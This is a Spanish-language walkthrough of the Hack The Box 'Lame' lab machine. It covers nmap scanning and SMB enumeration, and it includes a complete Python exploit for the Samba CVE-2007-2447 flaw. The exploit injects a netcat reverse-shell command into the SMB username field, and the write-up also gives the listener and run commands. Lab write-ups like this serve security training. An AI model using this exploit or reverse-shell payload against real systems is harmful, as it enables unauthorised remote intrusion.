Lame

OS: Linux
Dificultad: Fácil
Puntos: 20

Nmap Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.3 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumeracion

En la maquina vemos varios puertos abiertos. Enumeramos los puertos SMB (139,445) e identificamos que podemos escribir en uno de los directorios compartidos.

smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

Sin embargo vemos que no contiene nada relevante para nosotros.

smbclient //10.10.10.3/tmp
smb: \> ls
  .                                   D        0  Tue Jan  7 01:11:12 2025
  ..                                 DR        0  Sat Oct 31 03:33:58 2020
  5569.jsvc_up                        R        0  Mon Jan  6 16:42:26 2025
  .ICE-unix                          DH        0  Mon Jan  6 16:41:21 2025
  vmware-root                        DR        0  Mon Jan  6 16:41:27 2025
  .X11-unix                          DH        0  Mon Jan  6 16:41:49 2025
  .X0-lock                           HR       11  Mon Jan  6 16:41:49 2025
  vgauthsvclog.txt.0                  R     1600  Mon Jan  6 16:41:20 2025

SMB 3.0.20 - Command Execute (CVE-2007-2447)

Despues de enumerar identificamos que la version de SMB que esta usando el servidor es vulnerable a Command Execute. Utilizamos el siguiente script para explotar el servicio.

Note

Es necesario instalar la libreria pysmb.
pip install pysmb

exploit.py
import sys
from smb.SMBConnection import SMBConnection


if len(sys.argv) != 5:
    print("* CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution *\n")
    print("Usage: python3 exploit.py <rhost> <rport> <lhost> <lport>")
    print("Example: python3 exploit.py 10.10.10.10 139 127.0.0.1 4444")
    sys.exit()

rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]

username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username=username, password='', my_name='', remote_name='')

try:
    print("[...] Sending payload")
    conn.connect(rhost, rport, timeout=10)
except Exception as e:
    print("[ + ] You should be getting a shell now.")
    sys.exit(e)

Ponemos a la escucha nuestro netcat.

nc -lvnp 1234

Ejecutamos el script.

python3 exploit.py 10.10.10.3 139 10.10.14.2 1234

Una vez ejecutado obtendremos nuestra reverse shell y no es necesario escalar privilegios.

Referencias

https://github.com/banomaly/CVE-2007-2447